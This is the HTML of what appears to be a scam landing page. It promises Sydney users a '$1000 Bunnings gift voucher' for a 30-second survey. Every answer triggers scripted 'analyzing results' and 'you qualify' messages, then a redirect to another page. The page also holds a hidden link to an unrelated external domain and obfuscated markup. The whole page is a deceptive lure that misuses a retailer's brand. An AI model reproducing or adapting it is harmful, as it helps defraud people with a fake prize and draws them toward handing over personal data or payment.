<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

	<!-- 260043  -->
	

	
		
	
	<meta charset="utf-8">
	<title>Congratulations!</title>
	
		 
	
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	
	
	
<!--
	Key Gen
	=======
	$1000 Bunnings gift voucher
	
	
-->
						<!-- <link rel="stylesheet" href="/templates/_common/_templates/blue_survey_noselect_EN_MO2/css/responsive.css"> -->

<!-- STARTAUDIO -->



<!-- ENDAUDIO -->
<meta name="robots" content="noindex, nofollow">

<link rel="stylesheet" type="text/css" href="index.css" media="all">
</head>
<body jhjlijpomuhn_m="l">


	


	


			

				<div class="top-bar cf">
			<div class="wrapper">
				<img class="logo-sm left" src="logo_sm.png">
				<h1 class="left">
					Congratulations!				</h1>		
			</div><!-- wrapper -->
		</div>
		<div class="header cf">
			<div class="wrapper">
				<div class="content-box">
				<div class="header-text">
	
					<p>We're giving Sydney users a chance to win a <strong>$1000 Bunnings gift voucher</strong><sup>®</sup>!</p>
					<p>Simply complete our 30 second survey!</p>
				</div>
								<div class="header-logos" style="padding-top:px;">
					<img src="bunnings.png">
				</div>
								</div>
			</div><!-- wrapper -->
		</div><!-- header -->
		<div class="main_content">
			<div class="wrapper">
				<div class="content-box">
					<div class="fade"></div>
					<div class="questions">
						<div id="question1" class="question">
							<h1 class="question-number">Question 1 of 5</h1>
							<div class="question-text">
								Are you male or female?
							</div>
							<div class="answers">
								<ul class="answer-list">
									<li>
										<a onclick="nextQuestion(2);" class="btn rollover"><span>Male</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(2);" class="btn rollover"><span>Female</span></a>
									</li>
								</ul>
							</div>
						</div><!-- question -->
						<div id="question2" class="question">
							<h1 class="question-number">Question 2 of 5</h1>
							<div class="question-text">
								Do you shop online?
							</div>	
							<div class="answers">
								<ul class="answer-list">
									<li>
										<a onclick="nextQuestion(3);" class="btn rollover"><span>Yes</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(3);" class="btn rollover"><span>No</span></a>
									</li>
								</ul>
							</div>
						</div><!-- question -->	
						<div id="question3" class="question">
							<h1 class="question-number">Question 3 of 5</h1>
							<div class="question-text">
								How old are you?
							</div>	
							<div class="answers">
								<ul class="answer-list">
									<li>
										<a onclick="nextQuestion(4);" class="btn rollover"><span>18-29</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(4);" class="btn rollover"><span>30-39</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(4);" class="btn rollover"><span>40-49</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(4);" class="btn rollover"><span>50+</span></a>
									</li>														
								</ul>
							</div>
						</div><!-- question -->
						<div id="question4" class="question">
							<h1 class="question-number">Question 4 of 5</h1>
							<div class="question-text">
								What would you like to win most?
							</div>	
							<div class="answers">
								<ul class="answer-list">
									<li>
										<a onclick="nextQuestion(5);" class="btn s1 rollover"><span>Clothing</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(5);" class="btn s2 rollover"><span>Beauty Products</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(5);" class="btn s1 rollover"><span>Electronics</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(5);" class="btn s2 rollover"><span>Home Appliances</span></a>
									</li>														
								</ul>
							</div>
						</div>
						<div id="question5" class="question">
							<h1 class="question-number">Question 5 of 5</h1>
							<div class="question-text">
								Which of these is your favourite colour?
							</div>	
							<div class="answers">
								<ul class="answer-list">
									<li>
										<a onclick="nextQuestion(6, 'RDbunningswap3803AU.html');" class="btn rollover"><span>Blue</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(6, 'RDbunningswap3803AU.html');" class="btn rollover"><span>Red</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(6, 'RDbunningswap3803AU.html');" class="btn rollover"><span>Green</span></a>
									</li>
									<li>
										<a onclick="nextQuestion(6, 'RDbunningswap3803AU.html');" class="btn rollover"><span>Black</span></a>
									</li>														
								</ul>
							</div>
						</div><!-- question -->								
						<div id="question6" class="question">
							<div class="loader">
								<div class="text_container">
									<div class="text1 text">
									Submitting Answers...
									</div>
									<div class="text2 text">
									Analyzing Results...
									</div>
									<div class="text3 text">
										<div class="success-header">Congratulations you qualify!</div>
										<div class="success-redirect">Redirecting to prize page...</div>
									</div>
								</div>										
								
								<div class="loader-image"><img src="loader.gif" width="100"></div>
								
							</div>
						</div><!-- question -->
					</div><!-- questions -->
				</div><!-- content-box -->
			</div><!-- wrapper -->
		</div><!-- main_content -->			
		<div class="footer">
				</div>
	<!-- wrapper -->



<a href="http://exclusive-rewards.veinshow.country/admin_config" style="display: none;"></a><!-- Mini 1425919156 --><div style="display: none;" id="__fghjktghndfgt_once"></div></body>
</html>
